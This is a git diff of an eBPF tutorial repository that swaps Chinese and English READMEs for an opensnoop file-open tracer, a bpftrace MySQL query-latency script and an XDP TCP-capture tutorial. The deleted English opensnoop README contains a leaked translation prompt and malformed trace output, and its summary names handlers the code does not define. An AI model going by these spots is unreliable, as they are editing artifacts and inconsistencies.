PID。用户态程序可以设置此变量的值,以便在 eBPF 程序中只捕获与指定 PID 相关的 `sys_openat` 系统调用。 + +使用全局变量的原理是,全局变量在 eBPF 程序的数据段(data section)中定义并存储。当 eBPF 程序加载到内核并执行时,这些全局变量会保持在内核中,可以通过 BPF 系统调用进行访问。用户态程序可以使用 BPF 系统调用中的某些特性,如 `bpf_obj_get_info_by_fd` 和 `bpf_obj_get_info`,获取 eBPF 对象的信息,包括全局变量的位置和值。 + +可以通过执行 ecli -h 命令来查看 opensnoop 的帮助信息: + +```console +$ ecli package.json -h +Usage: opensnoop_bpf [--help] [--version] [--verbose] [--pid_target VAR] + +Trace open family syscalls. + +Optional arguments: + -h, --help shows help message and exits + -v, --version prints version information and exits + --verbose prints libbpf debug information + --pid_target Process ID to trace + +Built with eunomia-bpf framework. +See https://github.com/eunomia-bpf/eunomia-bpf for more information. +``` + +可以通过 `--pid_target` 选项来指定要捕获的进程的 pid,例如: + +```console +$ sudo ./ecli run package.json --pid_target 618 +Runing eBPF program... +``` + +运行这段程序后,可以通过查看 `/sys/kernel/debug/tracing/trace_pipe` 文件来查看 eBPF 程序的输出: + +```console +$ sudo cat /sys/kernel/debug/tracing/trace_pipe + <...>-3840345 [010] d... 3220701.101179: bpf_trace_printk: Process ID: 618 enter sys openat + <...>-3840345 [010] d... 3220702.158000: bpf_trace_printk: Process ID: 618 enter sys openat +``` + +## 总结 + +本文介绍了如何使用 eBPF 程序来捕获进程打开文件的系统调用。在 eBPF 程序中,我们可以通过定义 `tracepoint__syscalls__sys_enter_open` 和 `tracepoint__syscalls__sys_enter_openat` 函数并使用 `SEC` 宏把它们附加到 sys_enter_open 和 sys_enter_openat 两个 tracepoint 来捕获进程打开文件的系统调用。我们可以使用 `bpf_get_current_pid_tgid` 函数获取调用 open 或 openat 系统调用的进程 ID,并使用 `bpf_printk` 函数在内核日志中打印出来。在 eBPF 程序中,我们还可以通过定义一个全局变量 `pid_target` 来指定要捕获的进程的 pid,从而过滤输出,只输出指定的进程的信息。 + +通过学习本教程,您应该对如何在 eBPF 中捕获和过滤特定进程的系统调用有了更深入的了解。这种方法在系统监控、性能分析和安全审计等场景中具有广泛的应用。 + +更多的例子和详细的开发指南,请参考 eunomia-bpf 的官方文档: + +如果您希望学习更多关于 eBPF 的知识和实践,可以访问我们的教程代码仓库 或网站 以获取更多示例和完整的教程。 diff --git a/src/4-opensnoop/README_en.md b/src/4-opensnoop/README_en.md deleted file mode 100644 index c2648cf..0000000 --- a/src/4-opensnoop/README_en.md +++ /dev/null @@ -1,122 +0,0 @@ -# eBPF Tutorial by Example 4: Capturing Opening Files and Filter with Global Variables - -eBPF (Extended Berkeley Packet Filter) is a kernel execution environment that allows users to run secure and efficient programs in the kernel. It is commonly used for network filtering, performance analysis, security monitoring, and other scenarios. The power of eBPF lies in its ability to capture and modify network packets or system calls at runtime in the kernel, enabling monitoring and adjustment of the operating system's behavior. - -This article is the fourth part of the eBPF Tutorial by Example, mainly focusing on how to capture the system call collection of process opening files and filtering process PIDs using global variables in eBPF. - -In Linux system, the interaction between processes and files is achieved through system calls. System calls serve as the interface between user space programs and kernel space programs, allowing user programs to request specific operations from the kernel. In this tutorial, we focus on the sys_openat system call, which is used to open files. - -When a process opens a file, it issues a sys_openat system call to the kernel and passes relevant parameters (such as file path, open mode, etc.). The kernel handles this request and returns a file descriptor, which serves as a reference for subsequent file operations. By capturing the sys_openat system call, we can understand when and how a process opens a file. - -## Capturing the System Call Collection of Process Opening Files in eBPF - -First, we need to write an eBPF program to capture the system call of a process opening a file. The specific implementation is as follows: - -```c -#include -#include - -/// @description "Process ID to trace" -const volatile int pid_target = 0; - -SEC("tracepoint/syscalls/sys_enter_openat") -int tracepoint__syscalls__sys_enter_openat(struct trace_event_raw_sys_enter* ctx) -{ - u64 id = bpf_get_current_pid_tgid(); - u32 pid = id >> 32; - - if (pid_target && pid_target != pid) - return false; - - // Use bpf_printk to print the process information - bpf_printk("Process ID: %d enter sys openat\n", pid); - return 0; -} - -/// "Trace open family syscalls." -char LICENSE[] SEC("license") = "GPL"; -``` - -This eBPF program implements the following: - -1. Include header files: contains the definition of kernel data structures, and contains the helper functions required by eBPF programs. -2. Define the global variable `pid_target` for filtering a specified process ID. Setting it to 0 captures sys_openat calls from all processes. -3. Use the `SEC` macro to define an eBPF program associated with the tracepoint "tracepoint/syscalls/sys_enter_openat". This tracepoint is triggered when a process initiates the `sys_openat` system call. -4. Implement the eBPF program `tracepoint__syscalls__sys_enter_openat`, which takes a parameter `ctx` of type `struct trace_event_raw_sys_enter`. This structure contains information about the system call. -5. Use the `bpf_get_current_pid_tgid()` function to retrieve the PID and TID (Thread ID) of the current process. Since we only care about the PID, we shift its value 32 bits to the right and assign it to the variable `pid` of Type `u32`. -6. Check if the `pid_target` variable is equal to the current process's PID. If `pid_target` is not 0 and is not equal to the current process's PID, return `false` to skip capturing the `sys_openat` call of that process. -7. Use the `bpf_printk()` function to print the captured process ID and relevant information about the `sys_openat` call. These information can be viewed in user space using BPF tools. -8. Set the program license to "GPL", which is a necessary condition for running eBPF programs.### Instructions -Translate the following Chinese text to English while maintaining the original formatting: - -"This eBPF program can be loaded into the kernel and executed using tools like libbpf or eunomia-bpf. It captures the sys_openat system call of the specified process (or all processes) and outputs relevant information in user-space. - -eunomia-bpf is an open-source eBPF dynamic loading runtime and development toolchain combined with Wasm. Its purpose is to simplify the development, building, distribution, and execution of eBPF programs. You can refer to to download and install the ecc compilation toolchain and ecli runtime. We will use eunomia-bpf to compile and run this example. The complete code of this example can be found at . - -Compile and run the above code: - -```console -$ ecc opensnoop.bpf.c -Compiling bpf object... -Packing ebpf object and config into package.json... -$ sudo ecli run package.json -Running eBPF program... -``` - -After running this program, you can view the output of the eBPF program by viewing the `/sys/kernel/debug/tracing/trace_pipe` file: - -```console -$ sudo cat /sys/kernel/debug/tracing/trace_pipe - <...>-3840345 [010] d... 3220701.101179: bpf_trace_printk: Process ID: 3840345 enter sys openat - <...>-3840345 [010] d... 3220702.158000: bpf_trace_printk: Process ID: 3840345 enter sys openat -``` - -At this point, we are able to capture the sys_openat system call for opening files by processes. - -## Filtering Process PID in eBPF using Global Variables - -Global variables act as a data sharing mechanism in eBPF programs, allowing data interaction between user space programs and eBPF programs. This is very useful when filtering specific conditions or modifying the behavior of eBPF programs. This design allows user space programs to dynamically control the behavior of eBPF programs at runtime. - -In our example, the global variable `pid_target` is used to filter process PIDs. User space programs can set the value of this variable to capture only the `sys_openat` system calls related to the specified PID in the eBPF program. - -The principle of using global variables is that they are defined and stored in the data section of eBPF programs. When the eBPF program is loaded into the kernel and executed, these global variables are retained in the kernel and can be accessed through BPF system calls. User space programs can use certain features of BPF system calls, such as `bpf_obj_get_info_by_fd` and `bpf_obj_get_info`, to obtain information about the eBPF object, including the position and value of global variables. - -You can view the help information for opensnoop by executing the command `ecli -h`: - -```console -$ ecli package.json -h -Usage: opensnoop_bpf [--help] [--version] [--verbose] [--pid_target VAR] - -Trace open family syscalls. - -Optional arguments: - -h, --help shows help message and exits - -v, --version prints version information and exits - --verbose prints libbpf debug information - --pid_target Process ID to trace - -Built with eunomia-bpf framework. -See https://github.com/eunomia-bpf/eunomia-bpf for more information. -``` - -You can specify the PID of the process to capture by using the `--pid_target` option, for example: - -```console -$ sudo ./ecli run package.json --pid_target 618 -Running eBPF program... -``` - -After running this program, you can view the output of the eBPF program by viewing the `/sys/kernel/debug/tracing/trace_pipe` file: - -```console -$ sudo cat /sys/kernel/debug/tracing/trace_pipe".\-3840345 [010] d... 3220701.101179: bpf_trace_printk: Process ID: 618 enter sys openat -\-3840345 [010] d... 3220702.158000: bpf_trace_printk: Process ID: 618 enter sys openat -``` - -## Summary - -This article introduces how to use eBPF programs to capture the system calls for process file opening. In an eBPF program, we can capture the system calls for process file opening by defining functions `tracepoint__syscalls__sys_enter_open` and `tracepoint__syscalls__sys_enter_openat` and attaching them to the tracepoints `sys_enter_open` and `sys_enter_openat` using the `SEC` macro. We can use the `bpf_get_current_pid_tgid` function to get the process ID that calls the open or openat system call, and print it out in the kernel log using the `bpf_printk` function. In an eBPF program, we can also filter the output by defining a global variable `pid_target` to specify the pid of the process to be captured, only outputting the information of the specified process. - -By learning this tutorial, you should have a deeper understanding of how to capture and filter system calls for specific processes in eBPF. This method has widespread applications in system monitoring, performance analysis, and security auditing. - -If you want to learn more about eBPF knowledge and practices, you can visit our tutorial code repository at or website for more examples and a complete tutorial. diff --git a/src/40-mysql/README.md b/src/40-mysql/README.md index 7aa3486..6506ee5 100644 --- a/src/40-mysql/README.md +++ b/src/40-mysql/README.md @@ -1,82 +1,82 @@ -# 使用 eBPF 跟踪 MySQL 查询 +# Using eBPF to Trace MySQL Queries -MySQL 是全球最广泛使用的关系型数据库管理系统之一。无论您是在运行小型应用程序还是大型企业系统,了解 MySQL 数据库的性能特征都至关重要。特别是了解 SQL 查询的执行时间以及哪些查询占用了最多的时间,有助于诊断性能问题,并优化数据库以提高效率。 +MySQL is one of the most widely used relational database management systems in the world. Whether you are running a small application or a large-scale enterprise system, understanding the performance characteristics of your MySQL database can be crucial. In particular, knowing how long SQL queries take to execute and which queries are consuming the most time can help in diagnosing performance issues and optimizing your database for better efficiency. -在这种情况下,eBPF(扩展的伯克利包过滤器)可以派上用场。eBPF 是一项强大的技术,它允许您编写程序并在 Linux 内核中运行,帮助您跟踪、监控和分析系统行为的各个方面,包括 MySQL 这类应用程序的性能。在本文中,我们将探讨如何使用 eBPF 跟踪 MySQL 查询,测量其执行时间,并深入了解数据库的性能表现。 +This is where eBPF (Extended Berkeley Packet Filter) comes into play. eBPF is a powerful technology that allows you to write programs that can run in the Linux kernel, enabling you to trace, monitor, and analyze various aspects of system behavior, including the performance of applications like MySQL. In this blog, we'll explore how to use eBPF to trace MySQL queries, measure their execution time, and gain valuable insights into your database's performance. -## 背景:MySQL 和 eBPF +## Background: MySQL and eBPF ### MySQL -MySQL 是一种关系型数据库管理系统(RDBMS),使用结构化查询语言(SQL)来管理和查询数据。它广泛应用于各种场景,从 Web 应用程序到数据仓库。MySQL 的性能对应用程序的整体性能至关重要,尤其是在处理大数据集或复杂查询时。 +MySQL is a relational database management system (RDBMS) that uses Structured Query Language (SQL) to manage and query data. It is widely used for a variety of applications, from web applications to data warehousing. MySQL's performance can be critical to the overall performance of your application, especially when dealing with large datasets or complex queries. ### eBPF -eBPF 是一项允许在 Linux 内核中执行自定义程序的技术,而无需修改内核源代码或加载内核模块。eBPF 最初是为网络数据包过滤而设计的,但现在已经发展为一个多用途的工具,可用于性能监控、安全和调试。eBPF 程序可以附加到各种内核和用户空间事件上,使得我们能够跟踪函数、系统调用等的执行。 +eBPF is a technology that allows for the execution of custom programs in the Linux kernel without the need to modify the kernel source code or load kernel modules. Initially designed for network packet filtering, eBPF has evolved into a versatile tool for performance monitoring, security, and debugging. eBPF programs can be attached to various kernel and user-space events, making it possible to trace the execution of functions, system calls, and more. -使用 eBPF,我们可以跟踪 MySQL 的某些函数,例如负责处理 SQL 查询的 `dispatch_command` 函数。通过跟踪该函数,我们可以捕获查询执行的开始和结束时间,测量延迟,并记录执行的查询。 +Using eBPF, we can trace the execution of MySQL functions, such as `dispatch_command`, which is responsible for handling SQL queries. By tracing this function, we can capture the start and end times of query execution, measure the latency, and log the executed queries. -## MySQL 查询 +## Tracing MySQL Queries with eBPF -要使用 eBPF 跟踪 MySQL 查询,我们可以编写一个使用 `bpftrace` 的脚本,`bpftrace` 是一种 eBPF 的高级跟踪语言。以下是一个跟踪 MySQL 中 `dispatch_command` 函数的脚本,用于记录执行的查询并测量其执行时间: +To trace MySQL queries using eBPF, we can write a script using `bpftrace`, a high-level tracing language for eBPF. Below is a script that traces the `dispatch_command` function in MySQL to log executed queries and measure their execution time: ```bt #!/usr/bin/env bpftrace -// 跟踪 MySQL 中的 dispatch_command 函数 +// Trace the dispatch_command function in MySQL uprobe:/usr/sbin/mysqld:dispatch_command { - // 将命令执行的开始时间存储在 map 中 + // Store the start time of the command execution in the map @start_times[tid] = nsecs; - // 打印进程 ID 和命令字符串 + // Print the process ID and command string printf("MySQL command executed by PID %d: ", pid); - // dispatch_command 的第三个参数是 SQL 查询字符串 + // The third argument to dispatch_command is the SQL query string printf("%s\n", str(arg3)); } uretprobe:/usr/sbin/mysqld:dispatch_command { - // 从 map 中获取开始时间 + // Retrieve the start time from the map $start = @start_times[tid]; - // 计算延迟,以毫秒为单位 + // Calculate the latency in milliseconds $delta = (nsecs - $start) / 1000000; - // 打印延迟 + // Print the latency printf("Latency: %u ms\n", $delta); - // 从 map 中删除条目以避免内存泄漏 + // Delete the entry from the map to avoid memory leaks delete(@start_times[tid]); } ``` -### 脚本解释 +### Explanation of the Script -1. **跟踪 `dispatch_command` 函数**: - - 该脚本在 MySQL 中的 `dispatch_command` 函数上附加了一个 `uprobe`。该函数在 MySQL 需要执行 SQL 查询时调用。`Uprobe` 在内核模式 eBPF 运行时中可能会导致较大的性能开销。在这种情况下,您可以考虑使用用户模式 eBPF 运行时,例如 [bpftime](https://github.com/eunomia-bpf/bpftime)。 - - `uprobe` 捕获函数执行的开始时间并记录正在执行的 SQL 查询。 +1. **Tracing the `dispatch_command` Function**: + - The script attaches an `uprobe` to the `dispatch_command` function in MySQL. This function is called whenever MySQL needs to execute a SQL query. `Uprobe` in kernel mode eBPF runtime may also cause relatively large performance overhead. In this case, you can also consider using user mode eBPF runtime, such as [bpftime](https://github.com/eunomia-bpf/bpftime). + - The `uprobe` captures the start time of the function execution and logs the SQL query being executed. -2. **计算和记录延迟**: - - 一个相应的 `uretprobe` 附加到 `dispatch_command` 函数。`uretprobe` 在函数返回时触发,允许我们计算查询的总执行时间(延迟)。 - - 延迟以毫秒为单位计算并打印到控制台。 +2. **Calculating and Logging Latency**: + - A corresponding `uretprobe` is attached to the `dispatch_command` function. The `uretprobe` triggers when the function returns, allowing us to calculate the total execution time (latency) of the query. + - The latency is calculated in milliseconds and printed to the console. -3. **使用 Map 管理状态**: - - 脚本使用一个 BPF map 来存储每个查询的开始时间,并以线程 ID (`tid`) 作为键。这使我们能够匹配每次查询执行的开始和结束时间。 - - 在计算延迟后,从 map 中删除条目以避免内存泄漏。 +3. **Managing State with Maps**: + - The script uses a BPF map to store the start times of each query, keyed by the thread ID (`tid`). This allows us to match the start and end of each query execution. + - After calculating the latency, the entry is removed from the map to avoid memory leaks. -## 运行脚本 +## Running the Script -要运行此脚本,只需将其保存为文件(例如 `trace_mysql.bt`),然后使用 `bpftrace` 执行它: +To run this script, simply save it to a file (e.g., `trace_mysql.bt`), and then execute it using `bpftrace`: ```bash sudo bpftrace trace_mysql.bt ``` -### 输出示例 +### Sample Output -脚本运行后,它将打印 MySQL 执行的每个 SQL 查询的信息,包括进程 ID、查询内容以及延迟时间: +Once the script is running, it will print information about each SQL query executed by MySQL, including the process ID, the query itself, and the latency: ```console MySQL command executed by PID 1234: SELECT * FROM users WHERE id = 1; @@ -87,19 +87,19 @@ MySQL command executed by PID 1234: INSERT INTO orders (user_id, product_id) VAL Latency: 42 ms ``` -这个输出显示了正在执行的 SQL 命令以及每个命令的执行时间,为您提供了关于 MySQL 查询性能的宝贵见解。 +This output shows the SQL commands being executed and how long each one took, providing valuable insights into the performance of your MySQL queries. -## 跟踪 MySQL 查询可以带来什么收获? +## What Can We Learn from Tracing MySQL? -通过使用 eBPF 跟踪 MySQL 查询,您可以获得以下几点收获: +By tracing MySQL queries with eBPF, you can gain several insights: -- **识别慢查询**:您可以快速识别哪些 SQL 查询执行时间最长。这对于性能调优以及优化数据库模式或索引策略至关重要。 -- **监控数据库性能**:定期监控查询的延迟,确保您的 MySQL 数据库在不同工作负载下保持最佳性能。 -- **调试和故障排除**:在面对性能问题时,这种跟踪方法可以帮助您准确定位导致延迟的查询,从而更容易调试和解决问题。 -- **容量规划**:通过了解各种查询的延迟,您可以更好地进行容量规划,确保您的 MySQL 数据库能够处理更高的负载或更复杂的查询。 +- **Identify Slow Queries**: You can quickly identify which SQL queries are taking the longest to execute. This is critical for performance tuning and optimizing your database schema or indexing strategies. +- **Monitor Database Performance**: Regularly monitor the latency of queries to ensure that your MySQL database is performing optimally under different workloads. +- **Debugging and Troubleshooting**: When facing performance issues, this tracing method can help you pinpoint the exact queries causing delays, making it easier to troubleshoot and resolve issues. +- **Capacity Planning**: By understanding the latency of various queries, you can better plan for capacity, ensuring that your MySQL database can handle increased load or more complex queries. -## 结论 +## Conclusion -eBPF 提供了一种强大的方法来监控和跟踪 MySQL 查询的性能,而无需对系统进行侵入式更改。通过使用 `bpftrace` 这样的工具,您可以实时了解数据库的性能表现,识别潜在的瓶颈,并优化系统以获得更好的性能。 +eBPF provides a powerful way to monitor and trace the performance of MySQL queries without making intrusive changes to your system. By using tools like `bpftrace`, you can gain real-time insights into how your database is performing, identify potential bottlenecks, and optimize your system for better performance. -如果您有兴趣了解更多关于 eBPF 的知识,以及如何将其用于监控和优化系统的其他部分,请访问我们的 [https://github.com/eunomia-bpf/bpf-developer-tutorial](https://github.com/eunomia-bpf/bpf-developer-tutorial) 或浏览我们的网站 [https://eunomia.dev/tutorials/](https://eunomia.dev/tutorials/) 获取更多示例和完整的教程。 +If you're interested in learning more about eBPF and how it can be used to monitor and optimize other parts of your system, be sure to check out our [https://github.com/eunomia-bpf/bpf-developer-tutorial](https://github.com/eunomia-bpf/bpf-developer-tutorial) or visit our [https://eunomia.dev/tutorials/](https://eunomia.dev/tutorials/) for more examples and complete tutorials. diff --git a/src/40-mysql/README.zh.md b/src/40-mysql/README.zh.md new file mode 100644 index 0000000..7aa3486 --- /dev/null +++ b/src/40-mysql/README.zh.md @@ -0,0 +1,105 @@ +# 使用 eBPF 跟踪 MySQL 查询 + +MySQL 是全球最广泛使用的关系型数据库管理系统之一。无论您是在运行小型应用程序还是大型企业系统,了解 MySQL 数据库的性能特征都至关重要。特别是了解 SQL 查询的执行时间以及哪些查询占用了最多的时间,有助于诊断性能问题,并优化数据库以提高效率。 + +在这种情况下,eBPF(扩展的伯克利包过滤器)可以派上用场。eBPF 是一项强大的技术,它允许您编写程序并在 Linux 内核中运行,帮助您跟踪、监控和分析系统行为的各个方面,包括 MySQL 这类应用程序的性能。在本文中,我们将探讨如何使用 eBPF 跟踪 MySQL 查询,测量其执行时间,并深入了解数据库的性能表现。 + +## 背景:MySQL 和 eBPF + +### MySQL + +MySQL 是一种关系型数据库管理系统(RDBMS),使用结构化查询语言(SQL)来管理和查询数据。它广泛应用于各种场景,从 Web 应用程序到数据仓库。MySQL 的性能对应用程序的整体性能至关重要,尤其是在处理大数据集或复杂查询时。 + +### eBPF + +eBPF 是一项允许在 Linux 内核中执行自定义程序的技术,而无需修改内核源代码或加载内核模块。eBPF 最初是为网络数据包过滤而设计的,但现在已经发展为一个多用途的工具,可用于性能监控、安全和调试。eBPF 程序可以附加到各种内核和用户空间事件上,使得我们能够跟踪函数、系统调用等的执行。 + +使用 eBPF,我们可以跟踪 MySQL 的某些函数,例如负责处理 SQL 查询的 `dispatch_command` 函数。通过跟踪该函数,我们可以捕获查询执行的开始和结束时间,测量延迟,并记录执行的查询。 + +## MySQL 查询 + +要使用 eBPF 跟踪 MySQL 查询,我们可以编写一个使用 `bpftrace` 的脚本,`bpftrace` 是一种 eBPF 的高级跟踪语言。以下是一个跟踪 MySQL 中 `dispatch_command` 函数的脚本,用于记录执行的查询并测量其执行时间: + +```bt +#!/usr/bin/env bpftrace + +// 跟踪 MySQL 中的 dispatch_command 函数 +uprobe:/usr/sbin/mysqld:dispatch_command +{ + // 将命令执行的开始时间存储在 map 中 + @start_times[tid] = nsecs; + + // 打印进程 ID 和命令字符串 + printf("MySQL command executed by PID %d: ", pid); + + // dispatch_command 的第三个参数是 SQL 查询字符串 + printf("%s\n", str(arg3)); +} + +uretprobe:/usr/sbin/mysqld:dispatch_command +{ + // 从 map 中获取开始时间 + $start = @start_times[tid]; + + // 计算延迟,以毫秒为单位 + $delta = (nsecs - $start) / 1000000; + + // 打印延迟 + printf("Latency: %u ms\n", $delta); + + // 从 map 中删除条目以避免内存泄漏 + delete(@start_times[tid]); +} +``` + +### 脚本解释 + +1. **跟踪 `dispatch_command` 函数**: + - 该脚本在 MySQL 中的 `dispatch_command` 函数上附加了一个 `uprobe`。该函数在 MySQL 需要执行 SQL 查询时调用。`Uprobe` 在内核模式 eBPF 运行时中可能会导致较大的性能开销。在这种情况下,您可以考虑使用用户模式 eBPF 运行时,例如 [bpftime](https://github.com/eunomia-bpf/bpftime)。 + - `uprobe` 捕获函数执行的开始时间并记录正在执行的 SQL 查询。 + +2. **计算和记录延迟**: + - 一个相应的 `uretprobe` 附加到 `dispatch_command` 函数。`uretprobe` 在函数返回时触发,允许我们计算查询的总执行时间(延迟)。 + - 延迟以毫秒为单位计算并打印到控制台。 + +3. **使用 Map 管理状态**: + - 脚本使用一个 BPF map 来存储每个查询的开始时间,并以线程 ID (`tid`) 作为键。这使我们能够匹配每次查询执行的开始和结束时间。 + - 在计算延迟后,从 map 中删除条目以避免内存泄漏。 + +## 运行脚本 + +要运行此脚本,只需将其保存为文件(例如 `trace_mysql.bt`),然后使用 `bpftrace` 执行它: + +```bash +sudo bpftrace trace_mysql.bt +``` + +### 输出示例 + +脚本运行后,它将打印 MySQL 执行的每个 SQL 查询的信息,包括进程 ID、查询内容以及延迟时间: + +```console +MySQL command executed by PID 1234: SELECT * FROM users WHERE id = 1; +Latency: 15 ms +MySQL command executed by PID 1234: UPDATE users SET name = 'Alice' WHERE id = 2; +Latency: 23 ms +MySQL command executed by PID 1234: INSERT INTO orders (user_id, product_id) VALUES (1, 10); +Latency: 42 ms +``` + +这个输出显示了正在执行的 SQL 命令以及每个命令的执行时间,为您提供了关于 MySQL 查询性能的宝贵见解。 + +## 跟踪 MySQL 查询可以带来什么收获? + +通过使用 eBPF 跟踪 MySQL 查询,您可以获得以下几点收获: + +- **识别慢查询**:您可以快速识别哪些 SQL 查询执行时间最长。这对于性能调优以及优化数据库模式或索引策略至关重要。 +- **监控数据库性能**:定期监控查询的延迟,确保您的 MySQL 数据库在不同工作负载下保持最佳性能。 +- **调试和故障排除**:在面对性能问题时,这种跟踪方法可以帮助您准确定位导致延迟的查询,从而更容易调试和解决问题。 +- **容量规划**:通过了解各种查询的延迟,您可以更好地进行容量规划,确保您的 MySQL 数据库能够处理更高的负载或更复杂的查询。 + +## 结论 + +eBPF 提供了一种强大的方法来监控和跟踪 MySQL 查询的性能,而无需对系统进行侵入式更改。通过使用 `bpftrace` 这样的工具,您可以实时了解数据库的性能表现,识别潜在的瓶颈,并优化系统以获得更好的性能。 + +如果您有兴趣了解更多关于 eBPF 的知识,以及如何将其用于监控和优化系统的其他部分,请访问我们的 [https://github.com/eunomia-bpf/bpf-developer-tutorial](https://github.com/eunomia-bpf/bpf-developer-tutorial) 或浏览我们的网站 [https://eunomia.dev/tutorials/](https://eunomia.dev/tutorials/) 获取更多示例和完整的教程。 diff --git a/src/40-mysql/README_en.md b/src/40-mysql/README_en.md deleted file mode 100644 index 6506ee5..0000000 --- a/src/40-mysql/README_en.md +++ /dev/null @@ -1,105 +0,0 @@ -# Using eBPF to Trace MySQL Queries - -MySQL is one of the most widely used relational database management systems in the world. Whether you are running a small application or a large-scale enterprise system, understanding the performance characteristics of your MySQL database can be crucial. In particular, knowing how long SQL queries take to execute and which queries are consuming the most time can help in diagnosing performance issues and optimizing your database for better efficiency. - -This is where eBPF (Extended Berkeley Packet Filter) comes into play. eBPF is a powerful technology that allows you to write programs that can run in the Linux kernel, enabling you to trace, monitor, and analyze various aspects of system behavior, including the performance of applications like MySQL. In this blog, we'll explore how to use eBPF to trace MySQL queries, measure their execution time, and gain valuable insights into your database's performance. - -## Background: MySQL and eBPF - -### MySQL - -MySQL is a relational database management system (RDBMS) that uses Structured Query Language (SQL) to manage and query data. It is widely used for a variety of applications, from web applications to data warehousing. MySQL's performance can be critical to the overall performance of your application, especially when dealing with large datasets or complex queries. - -### eBPF - -eBPF is a technology that allows for the execution of custom programs in the Linux kernel without the need to modify the kernel source code or load kernel modules. Initially designed for network packet filtering, eBPF has evolved into a versatile tool for performance monitoring, security, and debugging. eBPF programs can be attached to various kernel and user-space events, making it possible to trace the execution of functions, system calls, and more. - -Using eBPF, we can trace the execution of MySQL functions, such as `dispatch_command`, which is responsible for handling SQL queries. By tracing this function, we can capture the start and end times of query execution, measure the latency, and log the executed queries. - -## Tracing MySQL Queries with eBPF - -To trace MySQL queries using eBPF, we can write a script using `bpftrace`, a high-level tracing language for eBPF. Below is a script that traces the `dispatch_command` function in MySQL to log executed queries and measure their execution time: - -```bt -#!/usr/bin/env bpftrace - -// Trace the dispatch_command function in MySQL -uprobe:/usr/sbin/mysqld:dispatch_command -{ - // Store the start time of the command execution in the map - @start_times[tid] = nsecs; - - // Print the process ID and command string - printf("MySQL command executed by PID %d: ", pid); - - // The third argument to dispatch_command is the SQL query string - printf("%s\n", str(arg3)); -} - -uretprobe:/usr/sbin/mysqld:dispatch_command -{ - // Retrieve the start time from the map - $start = @start_times[tid]; - - // Calculate the latency in milliseconds - $delta = (nsecs - $start) / 1000000; - - // Print the latency - printf("Latency: %u ms\n", $delta); - - // Delete the entry from the map to avoid memory leaks - delete(@start_times[tid]); -} -``` - -### Explanation of the Script - -1. **Tracing the `dispatch_command` Function**: - - The script attaches an `uprobe` to the `dispatch_command` function in MySQL. This function is called whenever MySQL needs to execute a SQL query. `Uprobe` in kernel mode eBPF runtime may also cause relatively large performance overhead. In this case, you can also consider using user mode eBPF runtime, such as [bpftime](https://github.com/eunomia-bpf/bpftime). - - The `uprobe` captures the start time of the function execution and logs the SQL query being executed. - -2. **Calculating and Logging Latency**: - - A corresponding `uretprobe` is attached to the `dispatch_command` function. The `uretprobe` triggers when the function returns, allowing us to calculate the total execution time (latency) of the query. - - The latency is calculated in milliseconds and printed to the console. - -3. **Managing State with Maps**: - - The script uses a BPF map to store the start times of each query, keyed by the thread ID (`tid`). This allows us to match the start and end of each query execution. - - After calculating the latency, the entry is removed from the map to avoid memory leaks. - -## Running the Script - -To run this script, simply save it to a file (e.g., `trace_mysql.bt`), and then execute it using `bpftrace`: - -```bash -sudo bpftrace trace_mysql.bt -``` - -### Sample Output - -Once the script is running, it will print information about each SQL query executed by MySQL, including the process ID, the query itself, and the latency: - -```console -MySQL command executed by PID 1234: SELECT * FROM users WHERE id = 1; -Latency: 15 ms -MySQL command executed by PID 1234: UPDATE users SET name = 'Alice' WHERE id = 2; -Latency: 23 ms -MySQL command executed by PID 1234: INSERT INTO orders (user_id, product_id) VALUES (1, 10); -Latency: 42 ms -``` - -This output shows the SQL commands being executed and how long each one took, providing valuable insights into the performance of your MySQL queries. - -## What Can We Learn from Tracing MySQL? - -By tracing MySQL queries with eBPF, you can gain several insights: - -- **Identify Slow Queries**: You can quickly identify which SQL queries are taking the longest to execute. This is critical for performance tuning and optimizing your database schema or indexing strategies. -- **Monitor Database Performance**: Regularly monitor the latency of queries to ensure that your MySQL database is performing optimally under different workloads. -- **Debugging and Troubleshooting**: When facing performance issues, this tracing method can help you pinpoint the exact queries causing delays, making it easier to troubleshoot and resolve issues. -- **Capacity Planning**: By understanding the latency of various queries, you can better plan for capacity, ensuring that your MySQL database can handle increased load or more complex queries. - -## Conclusion - -eBPF provides a powerful way to monitor and trace the performance of MySQL queries without making intrusive changes to your system. By using tools like `bpftrace`, you can gain real-time insights into how your database is performing, identify potential bottlenecks, and optimize your system for better performance. - -If you're interested in learning more about eBPF and how it can be used to monitor and optimize other parts of your system, be sure to check out our [https://github.com/eunomia-bpf/bpf-developer-tutorial](https://github.com/eunomia-bpf/bpf-developer-tutorial) or visit our [https://eunomia.dev/tutorials/](https://eunomia.dev/tutorials/) for more examples and complete tutorials. diff --git a/src/41-xdp-tcpdump/README.md b/src/41-xdp-tcpdump/README.md index 3a78eae..b9a0764 100644 --- a/src/41-xdp-tcpdump/README.md +++ b/src/41-xdp-tcpdump/README.md @@ -1,22 +1,22 @@ -# eBPF 示例教程:使用 XDP 捕获 TCP 信息 +# eBPF Tutorial by Example: Capturing TCP Information with XDP -扩展伯克利包过滤器(eBPF)是 Linux 内核中的一项革命性技术,允许开发者在内核空间内运行沙箱程序。它提供了强大的网络、安全和跟踪能力,无需修改内核源代码或加载内核模块。本教程重点介绍如何使用 eBPF 结合 Express Data Path(XDP),在数据包进入时的最早阶段直接捕获 TCP 头信息。 +Extended Berkeley Packet Filter (eBPF) is a revolutionary technology in the Linux kernel that allows developers to run sandboxed programs within the kernel space. It enables powerful networking, security, and tracing capabilities without the need to modify the kernel source code or load kernel modules. This tutorial focuses on using eBPF with the Express Data Path (XDP) to capture TCP header information directly from network packets at the earliest point of ingress. -## 使用 XDP 捕获 TCP 头信息 +## Capturing TCP Headers with XDP -捕获网络数据包对于监控、调试和保护网络通信至关重要。传统工具如 `tcpdump` 在用户空间运行,可能会带来显著的开销。通过利用 eBPF 和 XDP,我们可以在内核中直接捕获 TCP 头信息,最小化开销并提高性能。 +Capturing network packets is essential for monitoring, debugging, and securing network communications. Traditional tools like `tcpdump` operate in user space and can incur significant overhead. By leveraging eBPF and XDP, we can capture TCP header information directly within the kernel, minimizing overhead and improving performance. -在本教程中,我们将开发一个 XDP 程序,该程序拦截传入的 TCP 数据包并提取其头信息。我们将这些数据存储在一个环形缓冲区中,用户空间的程序将读取并以可读的格式显示这些信息。 +In this tutorial, we'll develop an XDP program that intercepts incoming TCP packets and extracts their header information. We'll store this data in a ring buffer, which a user-space program will read and display in a human-readable format. -### 为什么使用 XDP 进行数据包捕获? +### Why Use XDP for Packet Capturing? -XDP 是 Linux 